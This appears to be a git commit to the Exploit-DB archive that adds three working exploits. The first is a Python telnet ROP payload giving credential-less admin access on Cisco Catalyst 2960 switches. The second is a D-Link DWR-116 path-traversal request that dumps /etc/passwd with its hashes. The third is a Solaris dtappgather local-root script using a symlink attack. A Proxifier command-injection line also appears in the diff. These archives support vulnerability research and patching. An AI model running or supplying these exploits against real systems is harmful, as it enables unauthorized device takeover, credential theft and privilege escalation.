From 2ac6fc17c20f615d7a7aa52335b76171bb0e1811 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 13 Apr 2017 05:01:16 +0000
Subject: [PATCH] DB: 2017-04-13

3 new exploits

Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation

Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution

D-Link DWR-116 / DWR-116A1 - Arbitrary File Download
---
 files.csv                            |  3 +
 platforms/hardware/remote/41872.py   | 83 ++++++++++++++++++++++++++++
 platforms/hardware/webapps/41840.txt | 36 ++++++++++++
 platforms/macos/local/41854.txt      |  1 +
 platforms/multiple/dos/41668.txt     |  2 +-
 platforms/multiple/dos/41669.txt     |  2 +-
 platforms/solaris/local/41871.sh     | 51 +++++++++++++++++
 7 files changed, 176 insertions(+), 2 deletions(-)
 create mode 100755 platforms/hardware/remote/41872.py
 create mode 100755 platforms/hardware/webapps/41840.txt
 create mode 100755 platforms/solaris/local/41871.sh

diff --git a/files.csv b/files.csv
index 761bccd8a..1ef791e52 100644
--- a/files.csv
+++ b/files.csv
@@ -8934,6 +8934,7 @@ id,file,description,date,author,platform,type,port
 41853,platforms/macos/local/41853.txt,"Proxifier for Mac 2.18 - Multiple Vulnerabilities",2017-04-11,Securify,macos,local,0
 41854,platforms/macos/local/41854.txt,"Proxifier for Mac 2.17 / 2.18 - Privesc Escalation",2017-04-11,"Mark Wadham",macos,local,0
 41870,platforms/multiple/local/41870.txt,"Xen - Broken Check in 'memory_exchange()' Permits PV Guest Breakout",2017-04-11,"Google Security Research",multiple,local,0
+41871,platforms/solaris/local/41871.sh,"Solaris 7 - 11 (x86 & SPARC) - 'EXTREMEPARR' dtappgather Privilege Escalation",2017-04-12,"Hacker Fantastic",solaris,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15436,6 +15437,7 @@ id,file,description,date,author,platform,type,port
 41850,platforms/windows/remote/41850.txt,"Moxa MXview 2.8 - Private Key Disclosure",2017-04-10,hyp3rlinx,windows,remote,0
 41852,platforms/windows/remote/41852.txt,"Moxa MX AOPC-Server 1.5 - XML External Entity Injection",2017-04-10,hyp3rlinx,windows,remote,0
 41861,platforms/linux/remote/41861.py,"Quest Privilege Manager 6.0.0 - Arbitrary File Write",2017-04-10,m0t,linux,remote,0
+41872,platforms/hardware/remote/41872.py,"Cisco Catalyst 2960 IOS 12.2(55)SE11 - 'ROCEM' Remote Code Execution",2017-04-12,"Artem Kondratenko",hardware,remote,23
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37722,6 +37724,7 @@ id,file,description,date,author,platform,type,port
 41837,platforms/php/webapps/41837.txt,"Survey Template 1.1 - 'masterkey1' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
 41838,platforms/php/webapps/41838.txt,"My Gaming Ladder Combo System 7.5 - SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
 41839,platforms/php/webapps/41839.txt,"Ladder System 6.0 - 'faqid' Parameter SQL Injection",2017-04-07,"Ihsan Sencan",php,webapps,0
+41840,platforms/hardware/webapps/41840.txt,"D-Link DWR-116 / DWR-116A1 - Arbitrary File Download",2017-04-07,"Patryk Bogdan",hardware,webapps,0
 41841,platforms/php/webapps/41841.html,"WordPress Plugin Firewall 2 1.3 - Cross-Site Request Forgery / Cross-Site Scripting",2017-04-07,dxw,php,webapps,80
 41842,platforms/cgi/webapps/41842.txt,"QNAP TVS-663 QTS < 4.2.4 build 20170313 - Command Injection",2017-04-07,"Harry Sintonen",cgi,webapps,0
 41844,platforms/php/webapps/41844.html,"e107 CMS 2.1.4 - Cross-Site Request Forgery",2017-04-07,"Zhiyang Zeng",php,webapps,0
diff --git a/platforms/hardware/remote/41872.py b/platforms/hardware/remote/41872.py
new file mode 100755
index 000000000..652285cfa
--- /dev/null
+++ b/platforms/hardware/remote/41872.py
@@ -0,0 +1,83 @@
+#!/usr/bin/python
+# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow
+# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
+# Date: 04.10.2017
+# Exploit Author: https://twitter.com/artkond
+# Vendor Homepage: https://www.cisco.com/
+# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)
+# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11
+# CVE : CVE-2017-3881
+# Description:
+#
+# The exploit connects to the Catalyst switch and patches
+# it execution flow to allow credless telnet interaction 
+# with highest privilege level
+#
+
+
+import socket
+import sys
+from time import sleep
+
+set_credless = True
+
+if len(sys.argv) < 3:
+	print sys.argv[0] + ' [host] --set/--unset'
+	sys.exit()
+elif sys.argv[2] == '--unset':
+	set_credless = False
+elif sys.argv[2] == '--set':
+	pass
+else:
+	print sys.argv[0] + ' [host] --set/--unset'
+	sys.exit()
+
+
+s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
+s.connect((sys.argv[1], 23))
+
+print '[+] Connection OK'
+print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
+print '[+] Sending cluster option'
+print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'
+
+
+
+payload = '\xff\xfa\x24\x00'
+payload += '\x03CISCO_KITS\x012:'
+payload += 'A' * 116
+payload += '\x00\x00\x37\xb4'		# first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
+#next bytes are shown as offsets from r1
+payload += '\x02\x3d\x55\xdc'		# +8  address of pointer to is_cluster_mode function - 0x34
+if set_credless is True:
+	payload += '\x00\x00\x99\x9c'	# +12 set  address of func that rets 1
+else:
+	payload +=	'\x00\x04\xeA\xe0'	# unset 
+payload += 'BBBB'					# +16(+0) r1 points here at second gadget
+payload += '\x00\xe1\xa9\xf4' 		# +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
+payload += 'CCCC'					# +8 
+payload += 'DDDD'					# +12
+payload += 'EEEE'					# +16(+0) r1 points here at third gadget
+payload += '\x00\x06\x7b\x5c'		# +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; 
+payload += '\x02\x3d\x55\xc8'		# +8  r1+8 = 0x23d55c8
+payload += 'FFFF'					# +12 
+payload += 'GGGG'					# +16(+0) r1 points here at fourth gadget 
+payload += '\x00\x6c\xb3\xa0' 		# +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
+if set_credless:
+	payload += '\x00\x27\x0b\x94'	# +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; 
+else:
+	payload += '\x00\x04\xe7\x78'	# unset
+payload += 'HHHH'					# +12
+payload += 'IIII'					# +16(+0) r1 points here at fifth gadget
+payload += '\x01\x4a\xcf\x98'		# +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
+payload += 'JJJJ'					# +8 r1 points here at third gadget
+payload += 'KKKK'					# +12
+payload += 'LLLL'					# +16
+payload += '\x01\x14\xe7\xec'		# +20 original execution flow return addr
+payload += ':15:' +  '\xff\xf0'
+
+s.send(payload)
+
+print '[+] All done'
+
+s.close()
diff --git a/platforms/hardware/webapps/41840.txt b/platforms/hardware/webapps/41840.txt
new file mode 100755
index 000000000..4df4dea54
--- /dev/null
+++ b/platforms/hardware/webapps/41840.txt
@@ -0,0 +1,36 @@
+# Title: D-Link DWR-116 Arbitrary File Download
+# Vendor: D-Link (www.dlink.com)
+# Affected model(s): DWR-116 / DWR-116A1
+# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)
+# CVE: CVE-2017-6190
+# Date: 04.07.2016
+# Author: Patryk Bogdan (@patryk_bogdan)
+
+Description:
+D-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability
+which leads to unathorized file download from device filesystem.
+
+
+PoC:
+
+HTTP Request:
+GET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
+Host: 192.168.2.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+
+HTTP Response:
+HTTP/1.0 200 OK
+Content-Type: application/x-none
+Cache-Control: max-age=60
+Connection: close
+
+root:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash
+nobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin
+ftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin
+
+
+Fix:
+Update device to the new firmware (V1.05b09)
\ No newline at end of file
diff --git a/platforms/macos/local/41854.txt b/platforms/macos/local/41854.txt
index 06dfd009e..6af933f9c 100755
--- a/platforms/macos/local/41854.txt
+++ b/platforms/macos/local/41854.txt
@@ -48,4 +48,5 @@ rm -f a.c
 /Applications/Proxifier.app/Contents/KLoader 'blah; chown root:wheel /tmp/a ; chmod 4755 /tmp/a'
 /tmp/a
 
+
 -------------------------------------------------------------------
\ No newline at end of file
diff --git a/platforms/multiple/dos/41668.txt b/platforms/multiple/dos/41668.txt
index 4244d034d..3bccb226c 100755
--- a/platforms/multiple/dos/41668.txt
+++ b/platforms/multiple/dos/41668.txt
@@ -5,7 +5,7 @@
 # Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
 # Version: 2.8
 # Tested on: Linux Debian / Windows 7
-# CVE : CVE-2017-6191
+# CVE : CVE-2017-6192
 
 
 Additional analysis:
diff --git a/platforms/multiple/dos/41669.txt b/platforms/multiple/dos/41669.txt
index b607ae23d..9133e7e02 100755
--- a/platforms/multiple/dos/41669.txt
+++ b/platforms/multiple/dos/41669.txt
@@ -5,7 +5,7 @@
 # Software Link: https://sourceforge.net/projects/apngdis/files/2.8/
 # Version: 2.8
 # Tested on: Linux Debian / Windows 7
-# CVE : CVE-2017-6192
+# CVE : CVE-2017-6193
 
 Additional analysis:
 https://www.onvio.nl/nieuws/cve-2017-6192-apngdis-width-height-buffer-overflow
diff --git a/platforms/solaris/local/41871.sh b/platforms/solaris/local/41871.sh
new file mode 100755
index 000000000..4707f55bf
--- /dev/null
+++ b/platforms/solaris/local/41871.sh
@@ -0,0 +1,51 @@
+#!/bin/ksh
+#Exploit PoC reverse engineered from EXTREMEPARR which provides
+#local root on Solaris 7 - 11 (x86 & SPARC). Uses a environment
+#variable of setuid binary dtappgather to manipulate file
+#permissions and create a user owned directory anywhere on the
+#system (as root). Can then add a shared object to locale folder
+#and run setuid binaries with an untrusted library file.
+#
+# e.g.
+# $ id;uname -a; ./dtappgather-poc.sh
+# uid=60001(nobody) gid=60001(nobody)
+# SunOS sparc 5.8 Generic_117350-39 sun4m sparc SUNW,SPARCstation-20
+# [+] '/usr/dt/bin/dtappgather' directory traversal exploit
+# [-] get rid of any of our desktop files
+# [-] exploiting the traversal bug...
+# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
+# MakeDirectory: /var/dt/appconfig/appmanager/..: File exists
+# changePermissions: /var/dt/appconfig/appmanager/..| : No such file or directory
+# [-] symlink attack create our directory
+# dr-xr-xr-x   2 nobody   nobody       512 Apr 11 14:40 pdkhax
+# [-] Done. "/usr/lib/locale/pdkhax" is writeable
+# $ 
+#
+# To get root privileges simply exploit "at" by adding a .so.2
+# file in the new locale directory and calling "at".
+#
+# $ at -f /etc/passwd 11:11
+# job 1491991860.a at Ons Apr 12 11:11:00 2017
+# $ LC_TIME=pdkhax at -l
+# # id
+# uid=0(root) gid=60001(nobody)
+# 
+# -- Hacker Fantastic (www.myhackerhouse.com)
+echo "[+] '/usr/dt/bin/dtappgather' directory traversal exploit"
+echo "[-] get rid of any of our desktop files"
+chmod -R 777 /var/dt/appconfig/appmanager/*
+rm -rf /var/dt/appconfig/appmanager/*
+echo [-] exploiting the traversal bug...
+DTUSERSESSION=. /usr/dt/bin/dtappgather
+DTUSERSESSION=. /usr/dt/bin/dtappgather
+DTUSERSESSION=.. /usr/dt/bin/dtappgather
+DTUSERSESSION=.. /usr/dt/bin/dtappgather
+DTUSERSESSION=.. /usr/dt/bin/dtappgather
+echo [-] symlink attack create our directory 
+ln -sf /usr/lib/locale /var/dt/appconfig/appmanager
+DTUSERSESSION=pdkhax /usr/dt/bin/dtappgather
+ls -al /usr/lib/locale | grep pdkhax
+rm -rf /var/dt/appconfig/appmanager
+chmod 755 /usr/lib/locale/pdkhax
+echo [-] Done. "/usr/lib/locale/pdkhax" is writeable
+